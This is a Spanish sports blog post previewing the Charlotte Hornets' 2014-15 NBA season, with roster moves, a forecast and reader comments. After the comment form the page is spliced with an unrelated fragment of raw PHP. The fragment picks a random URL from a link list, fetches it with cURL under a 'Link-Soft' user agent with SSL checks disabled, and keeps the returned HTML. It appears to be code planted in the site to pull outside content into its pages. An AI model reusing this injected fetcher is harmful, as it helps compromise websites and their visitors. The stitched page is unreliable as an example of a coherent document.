Charlotte Hornets 2014-2015: El espíritu de la colmena

08 de October de 2014 por TheDeerHunter

Comienza una nueva era en Charlotte con el regreso del avispón. La metamorfosis se anticipó una temporada, con un visible cambio en términos de ambición. Por fin parece que MJ dio con la tecla para dejar de ser el hazmerreír del mundillo y logró formar un grupo competitivo con un digno número de victorias. Este verano tocaba darle una vuelta de tuerca más al proyecto y han mantenido la línea. Se han asumido riesgos pero tratando de mejorar el equipo tanto a corto como a medio plazo. La evolución de este proyecto es de lo más interesante que nos puede ofrecer el presente curso. En el plano negativo hay que destacar que Jeff Taylor permanecerá apartado del equipo hasta que se resuelvan sus problemas legales por violencia doméstica.

Jordan Hornets

Movimientos clave

Los Hornets volvieron a llevarse una pieza cotizada del mercado como es Lance Stephenson. Se trata de un jugador con mucho talento si logra permanecer centrado y además mejora mucho lo que había. Si hablamos de mejoras se ha apostado fuerte por la segunda unidad añadiendo a Marvin Williams y a Brian Roberts, así como los dos interesantes prospectos Noah Vonleh y PJ Hairston. Además Jason Maxiell ha llegado para el training camp y es bastante probable que se quede en el equipo, dependiendo del papel que le quiera dar Clifford a Williams.

Qué esperamos de ellos

Habrá que ver cómo fructifican las apuestas pero este equipo está diseñado para consolidar Playoffs e incluso tratar de dar guerra en ellos. Fundamental la evolución de los jóvenes, así como la integración de Stephenson dentro de la jerarquía, pues es un jugador con fama de problemático. Han formado un grupo muy compensado y no va a resultar fácil doblegarles.

Pronóstico

Por encima de las 45 victorias. Primera ronda, pero tienen un techo superior si se dan algunas circunstancias favorables.

Plantilla

PG: Kemba Walker, Brian Roberts, Jannero Pargo
SG: Lance Stephenson, Gerald Henderson, Gary Neal, P.J. Hairston(R)
SF: Michael Kidd-Gilchrist, Marvin Williams, Jeff Taylor
PF: Cody Zeller, Noah Vonleh(R), Jason Maxiell
C: Al Jefferson, Bismack Biyombo

Bajas: Josh McRoberts(MIA), Chris Douglas-Roberts(LAC), Brendan Haywood(CLE), Luke Ridnour(ORL), Anthony Tolliver (PHX), DJ White.

Comenta

6 comentarios a esta entrada

  1. txusma dice:
    #1

    Es posible que Marvin Williams salga de titular como PF praa jugar más bien abierto aunque de toda manera supongo q rápido se iría al banquillo para dejar paso a los Zeller, Vonleh o Biyombo y si los jóvenes no cumplen, a Maxiell.Parece que no pero la baja de Josh McRoberts puede ser importante.

      Citar

  2. Azabel dice:
    #2

    txusma:
    Es posible que Marvin Williams salga de titular como PF praa jugar más bien abierto aunque de toda manera supongo q rápido se iría al banquillo para dejar paso a los Zeller, Vonleh o Biyombo y si los jóvenes no cumplen, a Maxiell.Parece que no pero la baja de Josh McRoberts puede ser importante.

    es lo que estaba pensando, Williams llega para reemplazar a McRoberts, a la larga el puesto de 4 sera para Vonleh mas que para Zeller, quien no termino de cumplir expectativas en su año rookie

    la marcha de McRoberts obviamente los va a dañar, puesto que se jugo un temporadon, lanzando triples como nunca y aportando su ya conocido esfuerzo en toda la cancha

    la llegada de Stephenson, mas jefferson y walker los pone como un buen equipo, pero necesitan urgente una mejora en MKG, este año o nunca parece ser, y que tanto Zeller como Vonleh sean los jugadores que fueron en la universidad, de lo contrario no los veo tan bien como la mayoría

    stephenson es bueno pero es un idiota, nunca confiaría un proyecto a el

      Citar

  3. portu dice:
    #3

    Estoy de acuerdo con Txusma, lo más probable es q el quinteto incluya a Marvin Williams, uno de esos falsos titulares, ya q en 5 mins se irá al banquillo e igual no vuelve. Igual encaja bien con Al Jeff, pq a éste hay q dejarle espacio cerca de la zona, para q explote sus movimientos en ataque. Parece un equipo bastante compensado entre ataque y defensa, y tienen a 3 tíos capaces de crearse su tiro (Kemba, Stephenson y Big Al), además ya cuentan con un buen 6º (MKG o G. Henderson). De lo malo destaca lo cortitos que van por dentro, ya q Al Jeff siempre ha sido un “mirón” en defensa, Biyombo un pakete en general y C. Zeller todavía no sabemos qué es. Si siguen inspirados y según el impacto general en el juego de L. Stephenson apuntan a equipo de playoffs, pero les falta algo de sustancia para asustar a los cocos del Este.

      Citar

  4. Azabel dice:
    #4

    Defensivamente a pesar de tener a big al, deferian ser una muralla con stephenson, MKG y vonleh en el equipo hay potencial para ser los mejores de la liga en ese rubro

      Citar

  5. Ruxixon dice:
    #5

    http://instagram.com/p/tnhnedrwJ6/

    Parece que MKG ha cambiado su mecánica de tiro

      Citar

  6. Azabel dice:
    #6

    Q equipo tendrian los hornets si MKG se pareciera a lo que se esperaba de el al salir de la universidad

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>